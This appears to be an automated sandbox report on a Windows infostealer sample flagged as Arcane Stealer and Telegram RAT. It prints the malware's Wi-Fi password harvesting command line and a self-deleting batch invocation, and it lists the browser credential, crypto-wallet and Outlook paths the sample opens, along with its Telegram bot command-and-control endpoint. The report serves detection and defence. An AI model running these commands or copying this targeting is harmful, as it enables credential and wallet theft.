                        Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: zyEDYRU0jw.exe, ImportHider.csReference to suspicious API methods: LoadLibrary(dllName)
                        Source: zyEDYRU0jw.exe, ImportHider.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, methodName), typeof(T))
                        Source: zyEDYRU0jw.exe, Killer.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Users\user\Desktop\zyEDYRU0jw.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Uses netsh to modify the Windows network and firewall settings
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2257027503.0000000005B96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2257027503.0000000005B96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002BDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Microsoft Jaxx Liberty
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002BDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Microsoft ExodusWeb3 Wallet
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                        Tries to harvest and steal WLAN passwords
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts831
                        Windows Management Instrumentation                        		1
                        Scripting                        		11
                        Process Injection                        		111
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		931
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		641
                        Virtualization/Sandbox Evasion                        		LSASS Memory641
                        Virtualization/Sandbox Evasion                        		Remote Desktop Protocol1
                        Archive Collected Data                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                        Process Injection                        		Security Account Manager3
                        Process Discovery                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Obfuscated Files or Information                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object Model1
                        Clipboard Data                        		3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp                        		LSA Secrets1
                        System Network Configuration Discovery                        		SSHKeylogging4
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials1
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync134
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576963 Sample: zyEDYRU0jw.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 42 api.telegram.org 2->42 44 238.14.8.0.in-addr.arpa 2->44 46 icanhazip.com 2->46 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 60 7 other signatures 2->60 8 zyEDYRU0jw.exe 15 31 2->8         started        signatures3 58 Uses the Telegram API (likely for C&C communication) 42->58 process4 dnsIp5 48 api.telegram.org 149.154.167.220, 443, 49708 TELEGRAMRU United Kingdom 8->48 50 icanhazip.com 104.16.184.241, 49704, 80 CLOUDFLARENETUS United States 8->50 62 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 8->62 64 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->64 66 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->66 68 11 other signatures 8->68 12 cmd.exe 1 8->12         started        15 WerFault.exe 19 16 8->15         started        18 cmd.exe 1 8->18         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 70 Uses netsh to modify the Windows network and firewall settings 12->70 72 Tries to harvest and steal WLAN passwords 12->72 22 netsh.exe 2 12->22         started        24 conhost.exe 12->24         started        26 findstr.exe 1 12->26         started        28 chcp.com 1 12->28         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 15->40 dropped 30 taskkill.exe 1 18->30         started        32 conhost.exe 18->32         started        38 2 other processes 18->38 34 tasklist.exe 1 20->34         started        36 conhost.exe 20->36         started        signatures9 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        zyEDYRU0jw.exe63%ReversingLabsByteCode-MSIL.Infostealer.Polazert
                        zyEDYRU0jw.exe100%AviraHEUR/AGEN.1307083
                        zyEDYRU0jw.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep0%Avira URL Cloudsafe
                        https://x.com-https://ads.google.com-https://pay.google.com0%Avira URL Cloudsafe
                        https://mega.nz%https://roblox.com%https://cpanel.net0%Avira URL Cloudsafe
                        https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.0%Avira URL Cloudsafe
                        http://api.telegram.orgd0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          icanhazip.com
                          		104.16.184.241
                          		truefalse
                            		high
                            238.14.8.0.in-addr.arpa
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://icanhazip.com/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabtmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                      		high
                                      https://x.com-https://ads.google.com-https://pay.google.comzyEDYRU0jw.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.telegram.orgzyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epzyEDYRU0jw.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                          		high
                                          https://api.telegram.org/botzyEDYRU0jw.exefalse
                                            		high
                                            https://mega.nz%https://roblox.com%https://cpanel.netzyEDYRU0jw.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ozon.ruzyEDYRU0jw.exefalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                                  		high
                                                  http://upx.sf.netAmcache.hve.19.drfalse
                                                    		high
                                                    http://api.telegram.orgdzyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                                      		high
                                                      https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.zyEDYRU0jw.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://icanhazip.comzyEDYRU0jw.exefalse
                                                        		high
                                                        http://api.telegram.orgzyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.drfalse
                                                                		high
                                                                https://ipinfo.io/#zyEDYRU0jw.exefalse
                                                                  		high
                                                                  https://gmail.comzyEDYRU0jw.exefalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    149.154.167.220
                                                                    		api.telegram.orgUnited Kingdom
                                                                    		62041TELEGRAMRUfalse
                                                                    104.16.184.241
                                                                    		icanhazip.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1576963
                                                                    Start date and time:2024-12-17 19:46:05 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 43s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:22
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:zyEDYRU0jw.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@25/20@3/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 42
                                                                    • Number of non-executed functions: 8
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.21, 23.218.208.109, 13.107.246.63, 4.175.87.197, 20.190.147.2
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: zyEDYRU0jw.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    13:47:07API Interceptor73x Sleep call for process: zyEDYRU0jw.exe modified
                                                                    13:47:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        104.16.184.241itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                        • icanhazip.com/
                                                                                        3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                        • icanhazip.com/
                                                                                        7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                        • icanhazip.com/
                                                                                        T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                        • icanhazip.com/
                                                                                        VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                        • icanhazip.com/
                                                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                        • icanhazip.com/
                                                                                        gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                        • icanhazip.com/
                                                                                        uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                                                        • icanhazip.com/
                                                                                        yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                        • icanhazip.com/
                                                                                        5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                        • icanhazip.com/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        icanhazip.comitLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                        • 104.16.184.241
                                                                                        3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.184.241
                                                                                        CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                        • 104.16.185.241
                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                        • 104.16.185.241
                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                        • 104.16.185.241
                                                                                        7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.184.241
                                                                                        iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                                        • 104.16.185.241
                                                                                        T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.184.241
                                                                                        3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.185.241
                                                                                        VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.16.184.241
                                                                                        api.telegram.orgugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        • 149.154.167.220
